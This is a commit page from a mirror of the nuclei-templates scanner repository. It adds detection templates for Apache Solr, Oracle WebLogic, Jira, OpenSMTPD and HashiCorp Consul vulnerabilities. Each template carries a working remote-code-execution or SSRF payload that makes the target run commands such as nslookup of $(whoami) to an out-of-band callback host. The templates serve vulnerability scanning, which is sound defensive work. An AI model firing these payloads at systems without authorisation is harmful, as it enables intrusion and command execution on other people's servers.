daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-05-05 08:46:32 +03:00
parent c95dc69495 0a393f118e
commit a094b38f83
6 changed files with 158 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 302 | vulnerabilities | 144 | exposed-panels | 124 |
| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
| takeovers | 68 | exposures | 91 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1045 files**.
**102 directories, 1049 files**.
</td>
</tr>

26
cves/2017/CVE-2017-12629.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

44
cves/2017/CVE-2017-3506.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference: |
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

17
cves/2017/CVE-2017-9506.yaml
View File

@ -12,11 +12,18 @@ info:
tags: cve,cve2017,atlassian,jira,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "ipinfo.io/missingauth"
part: body
- "http"

38
cves/2020/CVE-2020-7247.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2020-7247
info:
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce
network:
- inputs:
- read: 1024
- data: "helo target\r\n"
read: 1024
- data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
read: 1024
- data: "RCPT TO:<root>\r\n"
read: 1024
- data: "DATA\r\n"
read: 1024
- data: "\r\nxxxx\r\n.\r\n"
read: 1024
- data: "QUIT\r\n"
read: 1024
host:
- "{{Hostname}}"
- "{{Hostname}}:25"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: raw
words:
- "Message accepted for delivery"

36
vulnerabilities/other/hashicorp-consul-rce.yaml Normal file
View File

@ -0,0 +1,36 @@
id: hashicorp-consul-rce
info:
name: Hashicorp Consul Services Api RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/46074
tags: hashicorp,rce,oob
requests:
- raw:
- | # Create USER
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
{
"ID": "{{randstr}}",
"Name": "{{randstr}}",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"script": "nslookup {{interactsh-url}}",
"interval": "10s",
"Timeout": "86400s"
}
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"